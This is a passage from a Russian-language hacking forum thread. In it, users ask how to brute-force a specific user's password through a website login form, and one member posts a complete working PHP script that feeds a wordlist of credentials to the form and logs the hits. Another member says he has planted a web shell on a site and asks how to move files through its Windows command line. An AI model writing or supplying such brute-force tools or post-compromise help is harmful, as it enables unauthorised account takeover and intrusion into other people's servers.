Есть отличные команды в никсах: find и locate - вот и ищи логи. А в Win серверах все еще проще,обычно они либо в logs,либо как писал ChaaK - на диру выше www.
Незнал где спросить, запостил сюда. Нужно автоматически перебрать пароли по словарю на одном сайте через форму авторизации определенного пользователя Может кто-то подскажет способ, или подкинет скрипт?
2samarin wwwhack прога старая но принципы досихпор не поменялись так что юзай если капчи нет или ограничения на количество попыток если не найдешь могу скинуть на почту
PHP: <?################Брутфорс Форм################## ///////////////////////----(c) nc.STRIEM----////////////////////////// $filepas="file.txt" ; ///файл с данными для брута $filegood="good.txt"; ///файл с подходящими паролями $endifg=1; ///закончить при первом же найденом 1-да 0-нет $iskl=array(); //////строки которых не должно быть в правельных страницах///////// $iskl[0]="Неверный пароль"; //$iskl[1]="Неверная длина пароля!"; //$iskl[2]="ERROR"; //$iskl[3]="Ошибка"; ////////////////////////////////////////////////////////////////// $host="localhost"; ///хост $script="/form.php"; ///скрипт ///////////////////////////////////////////////Передоваемый Header /////////////////////////////////////////////////////// $header="POST http://$host$script HTTP/1.0\r\n"; $header.= "Host: $host\r\n"; $header.= "Content-Type: application/x-www-form-urlencoded\r\n"; //////Не обязательные параметры! но не всегда/// //$header.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\r\n"; //$header.="Accept-Language: ru\r\n"; //$header.= "Proxy-Connection: Keep-Alive\r\n"; //$header.= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.6 (build 01425))\r\n"; //$header.="Referer: http://microsoft.com\r\n"; //$header.="Cookie: CREATED=nc.STRIEM\r\n"; ####################################Сам брут##################################### set_time_limit(0); $fo=fopen($filepas,"r"); $kolvoporolei=0; $timestart=time('U'); $fgo=fopen($filegood,"a"); echo "<h3><center>Мы брутили http://$host$script</center></h3>"; while(!feof($fo)) {///////////////////////////////////////////// $fp = fsockopen("www.".$host, 80, $errno, $errstr, 30); if (!$fp) echo "$errstr ($errno)<br />\n"; else { $kolvoporolei++; $dan=rtrim(fgets($fo)); /////берем данные из файла $dannii=split(';',$dan); $out=$header; $zapr="login=$dannii[0]&password=$dannii[1]"; ////имена переменных и их значения сюда $contleng=strlen($zapr); $out.= "Content-Length: $contleng\r\n"; $out.= "Pragma: no-cache\r\n\r\n"; $out.= "$zapr\r\n\r\n"; fwrite($fp, $out); $conte=""; while (!feof($fp)) $conte.=fgets($fp); $est=1; for($i=0;$i<sizeof($iskl);$i++) if(strstr($conte, $iskl[$i])) { $est=0; break; } /////может понадобиться при настройки/// //echo htmlspecialchars($conte); break; ///////////////////////////////// if($est) { fwrite($fgo,$dannii[0].";".$dannii[1]."\n"); echo "<h3><tt>Найдено:".$dannii[0].";".$dannii[1]."</tt></h3>"; if($endifg) break; } fclose($fp); } }////////////////////////////////////////////////////////////////////////////////////////// fclose($fgo); $time=time('U')-$timestart; echo "<h1><center>Закончено</center></h1><br><h3><tt>Проверенно $kolvoporolei вариантов, за $time секунд!</tt></h3><br><h4 align=center><center><tt>©*nc.STRIEM<br>[email protected]</tt></center></h4>"; ?>
Всем здрасти.... Собственно сабж! Залил шелл(на сайт) и доступна тока командная строка виндувс, надо залить или стянуть какой либо файл! Когда пишу "ftp" в cmd то там просто пустая строка (не туда и не туда) вообщем я думаю не пашет команда(или я хз что).... Нужно стянуть файл (или залить) как это можно сделать (Ftp-глюки)
diznt А ты уверен что под маздаем сидишь? Может ты под FreeBSD, и пытаешься выполнить виндовые команды ))
Нет! Мне нужно именно через CMD CMD работает (то есть просмотр директорий доступен и т.п.) А так же интересует как скачать файл
Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING in......... есть сайт. На нем нашел такую страничку. Что ето и как его использовать???
